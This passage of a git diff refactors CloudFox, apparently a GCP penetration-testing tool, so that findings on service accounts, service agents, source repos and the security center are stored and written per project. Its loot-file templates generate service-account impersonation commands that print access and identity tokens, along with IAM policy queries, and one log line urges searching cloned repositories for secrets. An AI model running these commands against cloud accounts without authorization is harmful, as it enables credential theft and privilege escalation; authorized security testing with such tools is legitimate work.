assetsBody[i][2] > assetsBody[j][2] + }) + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "scc-findings", + Header: findingsHeader, + Body: findingsBody, + }, + } + + // Add assets table if any + if len(assetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "scc-assets", + Header: assetsHeader, + Body: assetsBody, + }) + } + + projectLevelData[projectID] = SecurityCenterOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_SECURITYCENTER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *SecurityCenterModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allFindings := m.getAllFindings() + allAssets := m.getAllAssets() + // Sort findings by severity - sort.Slice(m.Findings, func(i, j int) bool { - return severityRank(m.Findings[i].Severity) > severityRank(m.Findings[j].Severity) + sort.Slice(allFindings, func(i, j int) bool { + return severityRank(allFindings[i].Severity) > severityRank(allFindings[j].Severity) }) // Main findings table @@ -411,7 +567,7 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. } var findingsBody [][]string - for _, f := range m.Findings { + for _, f := range allFindings { resourceType := f.ResourceType if resourceType == "" { resourceType = "-" @@ -445,7 +601,7 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. } var assetsBody [][]string - for _, asset := range m.Assets { + for _, asset := range allAssets { resourceType := asset.ResourceType if resourceType == "" { resourceType = "-" @@ -466,11 +622,13 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. return assetsBody[i][4] > assetsBody[j][4] }) - // Collect loot files - only include if they have content beyond the header + // Collect all loot files - only include if they have content beyond the header var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 4c853211..255111e0 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -26,7 +26,13 @@ Features: - Identifies default service accounts (Compute, App Engine, etc.) - Detects disabled service accounts - Flags service accounts without key rotation -- Identifies impersonation opportunities`, +- Identifies impersonation opportunities + +Column Descriptions: +- Impersonation Type: The type of access a principal has TO this service account + (TokenCreator=can generate access tokens, KeyAdmin=can create keys, + ActAs=can attach SA to resources, SAAdmin=full admin, SignBlob/SignJwt=can sign as SA) +- Impersonator: The principal (user/SA/group) who has that impersonation capability`, Run: runGCPServiceAccountsCommand, } @@ -48,10 +54,11 @@ type ServiceAccountAnalysis struct { type ServiceAccountsModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - ServiceAccounts []ServiceAccountAnalysis - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectServiceAccounts map[string][]ServiceAccountAnalysis // projectID -> service accounts + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -77,14 +84,11 @@ func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { // Create module instance module := &ServiceAccountsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ServiceAccounts: []ServiceAccountAnalysis{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectServiceAccounts: make(map[string][]ServiceAccountAnalysis), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -93,11 +97,17 @@ func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) + // Get all service accounts for stats + allSAs := m.getAllServiceAccounts() + // Check results - if len(m.ServiceAccounts) == 0 { + if len(allSAs) == 0 { logger.InfoM("No service accounts found", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) return } @@ -106,7 +116,7 @@ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Log withKeys := 0 defaultSAs := 0 impersonatable := 0 - for _, sa := range m.ServiceAccounts { + for _, sa := range allSAs { if sa.HasKeys { withKeys++ } @@ -119,12 +129,21 @@ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Log } logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d default, %d impersonatable)", - len(m.ServiceAccounts), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + len(allSAs), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } +// getAllServiceAccounts returns all service accounts from all projects +func (m *ServiceAccountsModule) getAllServiceAccounts() []ServiceAccountAnalysis { + var all []ServiceAccountAnalysis + for _, sas := range m.ProjectServiceAccounts { + all = append(all, sas...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -167,13 +186,22 @@ func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID st analyzedSAs = append(analyzedSAs, analyzed) } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.ServiceAccounts = append(m.ServiceAccounts, analyzedSAs...) + m.ProjectServiceAccounts[projectID] = analyzedSAs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["serviceaccounts-commands"] = &internal.LootFile{ + Name: "serviceaccounts-commands", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } // Generate loot for each service account for _, sa := range analyzedSAs { - m.addServiceAccountToLoot(sa, projectID) + m.addServiceAccountToLoot(projectID, sa) } m.mu.Unlock() @@ -281,17 +309,15 @@ func isDefaultServiceAccount(email, projectID string) (bool, string) { // ------------------------------ // Loot File Management // ------------------------------ -func (m *ServiceAccountsModule) initializeLootFiles() { - m.LootMap["serviceaccounts-commands"] = &internal.LootFile{ - Name: "serviceaccounts-commands", - Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *ServiceAccountsModule) addServiceAccountToLoot(projectID string, sa ServiceAccountAnalysis) { + lootFile := m.LootMap[projectID]["serviceaccounts-commands"] + if lootFile == nil { + return } -} -func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysis, projectID string) { keyFileName := strings.Split(sa.Email, "@")[0] - m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# SERVICE ACCOUNT: %s\n"+ "# ==========================================\n"+ @@ -307,17 +333,17 @@ func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysi // Add impersonation info if available if sa.ImpersonationInfo != nil { if len(sa.ImpersonationInfo.TokenCreators) > 0 { - m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) + lootFile.Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) } if len(sa.ImpersonationInfo.KeyCreators) > 0 { - m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) + lootFile.Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) } if len(sa.ImpersonationInfo.ActAsUsers) > 0 { - m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) + lootFile.Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) } } - m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Impersonation commands:\n"+ "gcloud auth print-access-token --impersonate-service-account=%s\n"+ "gcloud auth print-identity-token --impersonate-service-account=%s\n\n"+ @@ -345,22 +371,36 @@ func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysi // Output Generation // ------------------------------ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Service accounts table - one row per IAM binding (impersonation permission) - saHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for service accounts table +// Impersonation Type: What capability the Impersonator has TO this service account +// Impersonator: Who has that capability (can impersonate/manage this SA) +func (m *ServiceAccountsModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Email", + "Priv Esc", "Display Name", "Disabled", "Default SA", "DWD", "Key Count", - "IAM Role", - "IAM Member", + "Impersonation Type", + "Impersonator", } +} - var saBody [][]string - for _, sa := range m.ServiceAccounts { +// serviceAccountsToTableBody converts service accounts to table body rows +func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []ServiceAccountAnalysis) [][]string { + var body [][]string + for _, sa := range serviceAccounts { disabled := "No" if sa.Disabled { disabled = "Yes" @@ -377,6 +417,12 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal dwd = "Yes" } + // Check privesc for this service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + privEsc = m.PrivescCache.GetPrivescSummary(sa.Email) + } + // Count user-managed keys keyCount := "-" userKeyCount := 0 @@ -390,178 +436,161 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal } // Build IAM bindings from impersonation info - // One row per IAM binding (member + role type) hasBindings := false if sa.ImpersonationInfo != nil { - // Token creators can get access tokens for _, member := range sa.ImpersonationInfo.TokenCreators { email := extractEmailFromMember(member) - if email != sa.Email { // Skip self-reference + if email != sa.Email { hasBindings = true - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "TokenCreator", - member, + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "TokenCreator", member, }) } } - // Key creators can create keys for _, member := range sa.ImpersonationInfo.KeyCreators { email := extractEmailFromMember(member) - if email != sa.Email { // Skip self-reference + if email != sa.Email { hasBindings = true - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "KeyAdmin", - member, + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "KeyAdmin", member, }) } } - // ActAs users can impersonate for _, member := range sa.ImpersonationInfo.ActAsUsers { email := extractEmailFromMember(member) - if email != sa.Email { // Skip self-reference + if email != sa.Email { hasBindings = true - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "ActAs", - member, + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "ActAs", member, }) } } - // SA Admins have full control for _, member := range sa.ImpersonationInfo.SAAdmins { email := extractEmailFromMember(member) - if email != sa.Email { // Skip self-reference + if email != sa.Email { hasBindings = true - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "SAAdmin", - member, + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "SAAdmin", member, }) } } - // SignBlob users for _, member := range sa.ImpersonationInfo.SignBlobUsers { email := extractEmailFromMember(member) - if email != sa.Email { // Skip self-reference + if email != sa.Email { hasBindings = true - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "SignBlob", - member, + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "SignBlob", member, }) } } - // SignJwt users for _, member := range sa.ImpersonationInfo.SignJwtUsers { email := extractEmailFromMember(member) - if email != sa.Email { // Skip self-reference + if email != sa.Email { hasBindings = true - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "SignJwt", - member, + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "SignJwt", member, }) } } } - // If no IAM bindings, still show the SA with empty IAM columns if !hasBindings { - saBody = append(saBody, []string{ - m.GetProjectName(sa.ProjectID), - sa.ProjectID, - sa.Email, - sa.DisplayName, - disabled, - defaultSA, - dwd, - keyCount, - "-", - "-", + body = append(body, []string{ + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + disabled, defaultSA, dwd, keyCount, "-", "-", }) } } + return body +} - // Collect loot files (only non-empty ones) - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAccountsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // Build tables - just one table now - tables := []internal.TableFile{ - { + for projectID, sas := range m.ProjectServiceAccounts { + body := m.serviceAccountsToTableBody(sas) + tableFiles := []internal.TableFile{{ Name: "serviceaccounts", - Header: saHeader, - Body: saBody, - }, + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ServiceAccountsOutput{Table: tableFiles, Loot: lootFiles} } - output := ServiceAccountsOutput{ - Table: tables, - Loot: lootFiles, + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ServiceAccountsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allSAs := m.getAllServiceAccounts() + body := m.serviceAccountsToTableBody(allSAs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{ + Name: "serviceaccounts", + Header: m.getTableHeader(), + Body: body, + }} + + output := ServiceAccountsOutput{Table: tables, Loot: lootFiles} - // Write output using HandleOutputSmart with scope support scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(id) } + err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + "project", + m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index f44c6d97..1d4a5725 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -47,9 +47,9 @@ Security Considerations: type ServiceAgentsModule struct { gcpinternal.BaseGCPModule - Agents []serviceagentsservice.ServiceAgentInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -74,11 +74,10 @@ func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { module := &ServiceAgentsModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Agents: []serviceagentsservice.ServiceAgentInfo{}, - LootMap: make(map[string]*internal.LootFile), + ProjectAgents: make(map[string][]serviceagentsservice.ServiceAgentInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -88,28 +87,38 @@ func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) - if len(m.Agents) == 0 { + allAgents := m.getAllAgents() + if len(allAgents) == 0 { logger.InfoM("No service agents found", globals.GCP_SERVICEAGENTS_MODULE_NAME) return } // Count cross-project agents crossProjectCount := 0 - for _, agent := range m.Agents { + for _, agent := range allAgents { if agent.IsCrossProject { crossProjectCount++ } } if crossProjectCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(m.Agents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(allAgents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) } else { - logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(m.Agents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(allAgents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) } m.writeOutput(ctx, logger) } +// getAllAgents returns all agents from all projects (for statistics) +func (m *ServiceAgentsModule) getAllAgents() []serviceagentsservice.ServiceAgentInfo { + var all []serviceagentsservice.ServiceAgentInfo + for _, agents := range m.ProjectAgents { + all = append(all, agents...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -128,10 +137,19 @@ func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID stri } m.mu.Lock() - m.Agents = append(m.Agents, agents...) + m.ProjectAgents[projectID] = agents + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["serviceagents-commands"] = &internal.LootFile{ + Name: "serviceagents-commands", + Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } for _, agent := range agents { - m.addAgentToLoot(agent) + m.addAgentToLoot(projectID, agent) } m.mu.Unlock() @@ -143,20 +161,18 @@ func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID stri // ------------------------------ // Loot File Management // ------------------------------ -func (m *ServiceAgentsModule) initializeLootFiles() { - m.LootMap["serviceagents-commands"] = &internal.LootFile{ - Name: "serviceagents-commands", - Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *ServiceAgentsModule) addAgentToLoot(projectID string, agent serviceagentsservice.ServiceAgentInfo) { + lootFile := m.LootMap[projectID]["serviceagents-commands"] + if lootFile == nil { + return } -} -func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceAgentInfo) { crossProjectNote := "" if agent.IsCrossProject { crossProjectNote = " [CROSS-PROJECT]" } - m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# SERVICE AGENT: %s%s (Project: %s)\n"+ "# ==========================================\n"+ @@ -167,10 +183,10 @@ func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceA ) if len(agent.Roles) > 0 { - m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) + lootFile.Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) } - m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Get IAM policy for project:\n"+ "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s' --format='table(bindings.role)'\n"+ "# Test impersonation (requires iam.serviceAccounts.getAccessToken):\n"+ @@ -184,7 +200,16 @@ func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceA // Output Generation // ------------------------------ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main agents table - one row per role + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { header := []string{ "Project Name", "Project ID", @@ -194,43 +219,73 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L "Cross-Project", } - var body [][]string - for _, agent := range m.Agents { - crossProject := "No" - if agent.IsCrossProject { - crossProject = "Yes" - } + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } - // One row per role - if len(agent.Roles) > 0 { - for _, role := range agent.Roles { - body = append(body, []string{ - m.GetProjectName(agent.ProjectID), - agent.ProjectID, - agent.ServiceName, - agent.Email, - role, - crossProject, - }) + // Build project-level outputs + for projectID, agents := range m.ProjectAgents { + body := m.agentsToTableBody(agents) + tables := []internal.TableFile{{ + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - } else { - // Agent with no roles - body = append(body, []string{ - m.GetProjectName(agent.ProjectID), - agent.ProjectID, - agent.ServiceName, - agent.Email, - "-", - crossProject, - }) } + + outputData.ProjectLevelData[projectID] = ServiceAgentsOutput{Table: tables, Loot: lootFiles} } - // Collect loot files + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ServiceAgentsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Service", + "Email", + "Role", + "Cross-Project", + } + + allAgents := m.getAllAgents() + body := m.agentsToTableBody(allAgents) + + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } @@ -269,3 +324,39 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L m.CommandCounter.Error++ } } + +// agentsToTableBody converts agents to table rows +func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.ServiceAgentInfo) [][]string { + var body [][]string + for _, agent := range agents { + crossProject := "No" + if agent.IsCrossProject { + crossProject = "Yes" + } + + // One row per role + if len(agent.Roles) > 0 { + for _, role := range agent.Roles { + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + role, + crossProject, + }) + } + } else { + // Agent with no roles + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + "-", + crossProject, + }) + } + } + return body +} diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go index 175b70e1..8e9914a7 100644 --- a/gcp/commands/sourcerepos.go +++ b/gcp/commands/sourcerepos.go @@ -46,9 +46,9 @@ After cloning, search for: type SourceReposModule struct { gcpinternal.BaseGCPModule - Repos []sourcereposservice.RepoInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectRepos map[string][]sourcereposservice.RepoInfo // projectID -> repos + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -73,11 +73,10 @@ func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { module := &SourceReposModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Repos: []sourcereposservice.RepoInfo{}, - LootMap: make(map[string]*internal.LootFile), + ProjectRepos: make(map[string][]sourcereposservice.RepoInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -87,17 +86,27 @@ func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { func (m *SourceReposModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SOURCEREPOS_MODULE_NAME, m.processProject) - if len(m.Repos) == 0 { + allRepos := m.getAllRepos() + if len(allRepos) == 0 { logger.InfoM("No Cloud Source Repositories found", globals.GCP_SOURCEREPOS_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(m.Repos)), globals.GCP_SOURCEREPOS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(allRepos)), globals.GCP_SOURCEREPOS_MODULE_NAME) logger.InfoM("[PENTEST] Clone repositories and search for secrets!", globals.GCP_SOURCEREPOS_MODULE_NAME) m.writeOutput(ctx, logger) } +// getAllRepos returns all repos from all projects (for statistics) +func (m *SourceReposModule) getAllRepos() []sourcereposservice.RepoInfo { + var all []sourcereposservice.RepoInfo + for _, repos := range m.ProjectRepos { + all = append(all, repos...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -116,10 +125,19 @@ func (m *SourceReposModule) processProject(ctx context.Context, projectID string } m.mu.Lock() - m.Repos = append(m.Repos, repos...) + m.ProjectRepos[projectID] = repos + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["sourcerepos-commands"] = &internal.LootFile{ + Name: "sourcerepos-commands", + Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } for _, repo := range repos { - m.addRepoToLoot(repo) + m.addRepoToLoot(projectID, repo) } m.mu.Unlock() @@ -131,15 +149,13 @@ func (m *SourceReposModule) processProject(ctx context.Context, projectID string // ------------------------------ // Loot File Management // ------------------------------ -func (m *SourceReposModule) initializeLootFiles() { - m.LootMap["sourcerepos-commands"] = &internal.LootFile{ - Name: "sourcerepos-commands", - Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *SourceReposModule) addRepoToLoot(projectID string, repo sourcereposservice.RepoInfo) { + lootFile := m.LootMap[projectID]["sourcerepos-commands"] + if lootFile == nil { + return } -} -func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { - m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# REPOSITORY: %s\n"+ "# ==========================================\n"+ @@ -148,24 +164,24 @@ func (m *SourceReposModule) 